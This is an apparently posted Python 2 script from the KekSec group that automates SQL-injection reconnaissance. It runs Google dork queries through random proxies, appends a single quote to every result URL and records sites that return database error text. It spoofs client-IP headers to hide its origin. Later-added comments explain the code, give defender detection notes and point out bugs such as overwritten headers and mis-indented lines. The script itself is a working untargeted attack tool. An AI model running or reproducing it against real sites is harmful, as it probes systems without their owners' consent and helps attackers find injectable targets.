KekSec

SQL Dork Scanner [Ultimate]

Nov 21st, 2017
  1. #!/usr/bin/python
  2. #Basic SQLi auto dorker and checker
  3. #coded by Freak/SynthMesc
  4. #Version 1.1.5
  5. import urllib2,urllib,sys,re,random,string,time,threading
  6. try:
         # Both positional arguments are required: argv[1] is the path of the
         # search-query ("dork") list and argv[2] the path of the proxy list.
         # The bare except below turns a missing argument into the usage line.
  7.     dorklist=sys.argv[1]
  8.     proxylist=sys.argv[2]
  9. except:
  10.     print "Usage: "+sys.argv[0]+" [DORK LIST] [PROXY LIST]" #Simple usage for the skids out ther ^_^
  11.     exit(1)
  12. def randomIP():
          # Returns a dotted-quad string built from four independent random
          # integers in 0..255. Nothing is validated, so the result can fall in
          # reserved or non-routable ranges. In this file the value is only used
          # as the content of client-supplied request headers.
          # Defender note: headers such as X-Forwarded-For or Client-IP are
          # attacker-controlled unless a trusted proxy hop sets them; log and
          # rate-limit on the connection's peer address instead.
  13.     return '.'.join('%s'%random.randint(0, 255) for i in range(4)) #Generate random IP for false headers
  14. def test(target,testchar, proxy):
          # Error-based probe. Requests target+testchar through the supplied
          # urllib2 proxy handler (5 second timeout) and looks for the words
          # "SQL", "Warning" or "Syntax" in the response body. A match is printed
          # and the URL is appended to SQLi_Vulnerable.txt. Returns nothing.
          #
          # Defender notes:
          # - The request is a plain GET whose URL ends in the test character;
          #   the only caller in this file passes a single quote. A request of
          #   that shape answered with database error text is the pattern to
          #   alert on in web and WAF logs.
          # - The check depends on the application echoing raw database or
          #   interpreter errors. Parameterised queries and generic error pages
          #   remove both the flaw and the signal this heuristic keys on.
          # - The match is a substring test on space-separated chunks, so any
          #   page that merely contains one of the words is recorded as a hit.
  15.     try:
  16.         opener = urllib2.build_opener(proxy)
              # Each assignment below replaces opener.addheaders instead of
              # extending it, so only the last pair (X-FORWARDED-FOR) is left in
              # the list when the request is opened.
  17.         opener.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11')] #Custom user agent.
  18.         opener.addheaders = [('CLIENT-IP',randomIP())] #Inject random IP header into multiple variables, to remain anonymous.
  19.         opener.addheaders = [('REMOTE-ADDR',randomIP())]
  20.         opener.addheaders = [('VIA',randomIP())]
  21.         opener.addheaders = [('X-FORWARDED-FOR',randomIP())]
  22.         keywords=["SQL", "Warning", "Syntax"]
  23.         print "[+] Trying "+target+testchar
  24.         try:
  25.             resp=opener.open(target+testchar,timeout=5)
  26.         except Exception, e:
                  # Any failure to fetch (including HTTP error statuses raised by
                  # urllib2) is printed and ends the probe for this URL.
  27.             print "[-] "+str(e)
  28.             return
  29.         for keyword in keywords:
  30.             try:
  31.                 for x in resp.read().split(" "):
  32.                     if keyword in x:
  33.                         print "[+] Found keyword '"+keyword+"' at "+target+testchar
                              # Results are appended, one URL per line, to a file in
                              # the current working directory.
  34.                         f=open("SQLi_Vulnerable.txt","a")
  35.                         f.write(target+testchar+"\r\n")
  36.                         f.close()
  37.                         break
  38.             except urllib2.HTTPError as e:
  39.                 print "[-] "+str(e)
  40.                 pass
  41.     except urllib2.URLError as e:
  42.         print "[-] "+str(e)
  43.         pass
  44. def spyder(dork,page):
          # Fetches one search-results URL (dork), extracts the result links and
          # starts one test() thread per external link. page is the result-page
          # counter used to recognise the "next page" link. Returns nothing.
          #
          # Defender notes:
          # - Targets are not chosen individually: any site whose indexed URLs
          #   match a query in the input list is probed. Exposure depends on what
          #   a search engine has indexed, not on who runs the site.
          # - Each result URL gets one request with a single quote appended (see
          #   the Thread call below). Bursts of such requests across many
          #   parameters or hosts are a usable detection signal.
          # - The proxy entry is drawn at random from the proxylist file, which
          #   is re-read on every call, so probe traffic may appear to come from
          #   unrelated proxy hosts.
  45.         proxies = open(proxylist, "r").read().split("\n")
  46.         proxy = random.choice(proxies).split(" ")[0]
  47.         proxy = urllib2.ProxyHandler({'http': proxy})
  48.     opener = urllib2.build_opener(proxy)
          # As in test(), every assignment replaces the header list; the Referer
          # pair assigned last is the only entry remaining.
  49.     opener.addheaders = [('User-agent','Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11')] #Custom user agent.
  50.     opener.addheaders = [('CLIENT-IP',randomIP())] #Inject random IP header into multiple variables, to remain anonymous.
  51.     opener.addheaders = [('REMOTE-ADDR',randomIP())]
  52.     opener.addheaders = [('VIA',randomIP())]
  53.     opener.addheaders = [('X-FORWARDED-FOR',randomIP())]
  54.     opener.addheaders = [('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')]
  55.     opener.addheaders = [('Accept-Language','en-US,en;q=0.5')]
  56.     opener.addheaders = [('Accept-Encoding','gzip, deflate')]
  57.     opener.addheaders = [('Referer',dork)]
  58.     try:
  59.         searchresults=opener.open(dork,timeout=5).read()
  60.     except Exception, e:
              # On any fetch error the function calls itself again with the same
              # arguments; there is no retry limit in this code.
  61.         print "[-] "+str(e)
  62.         print "[-] Bot has been blocked from google!!! Switching proxy."
  63.         spyder(dork, page)
          # The bare name below raises NameError when the first fetch failed and
          # searchresults was never assigned; that branch retries the fetch.
  64.     try:
  65.         searchresults
  66.     except NameError:
  67. #       print "[-] Variable undefined, re-searching"
  68.         try:
  69.             searchresults=opener.open(dork,timeout=5).read()
  70.         except:
  71.             try:
  72.                 searchresults=opener.open(dork,timeout=5).read()
  73.             except:
  74.                 print "[-] Bot has been blocked from google!!! Change VPN server or proxy! Press enter to continue"
  75.                 raw_input()
  76.                 spyder(dork, page)
  77.     else:
  78.         pass
  79. #       print "[+] Variable defined, continuing search"
  80.  
          # Every href value in the results page is examined. Links that look
          # like the next results page are followed recursively; all others are
          # treated as candidate result URLs.
  81.     for i in re.findall('''href=["'](.[^"']+)["']''',searchresults, re.I):
  82.         i=i.replace("amp;",'')
  83.         if i.endswith("start="+str(page)+"0&sa=N") and i.startswith("/search"):
  84.             dorkurl="https://encrypted.google.com"+i
  85.             print "[+] Searching next page "+dorkurl
  86.             spyder(dorkurl,page)
  87.             page+=1
  88.         i=urllib2.unquote(i).decode('utf8')
  89.         try:
                  # The result URL is taken from between "?q=" and "&sa=" of the
                  # redirect link. Links without "?q=" raise IndexError and are
                  # skipped by the bare except at the end of the loop body.
  90.             i=i.split("?q=")[1]
  91.             i=i.split("&sa=")[0]
  92.             if i.startswith("http"):
                          # The search engine's own hosts are skipped; only the
                          # http:// forms of these prefixes are listed here.
  93.                     if i.startswith("http://accounts.google.com"):
  94.                         continue
  95.                     elif i.startswith("http://www.google.com"):
  96.                         continue
  97.                     elif i.startswith("http://encrypted.google.com"):
  98.                         continue
  99.                     elif i.startswith("http://webcache.googleusercontent.com"):
  100.                         continue
  101.                     elif i!=dork.decode('utf8'):
                               # One thread per result URL, with no cap on how many
                               # run at once; the test character is a single quote.
  102.                         threading.Thread(target=test, args=(i,"'",proxy,)).start()
  103.         except:
  104.             continue
  105. f=open(dorklist,"r")
       # Driver loop: each line of the dork list becomes one search query,
       # URL-encoded with quote_plus and handed to spyder() starting at page 1.
       # Queries are processed one after another; the per-URL probes run in the
       # threads that spyder() starts.
  106. for dork in f.read().split("\n"):
  107.     print "[+] Searching for dork: '"+dork+"'"
  108.     spyder('https://encrypted.google.com/search?hl=en&q='+urllib.quote_plus(dork),1)
  109. f.close()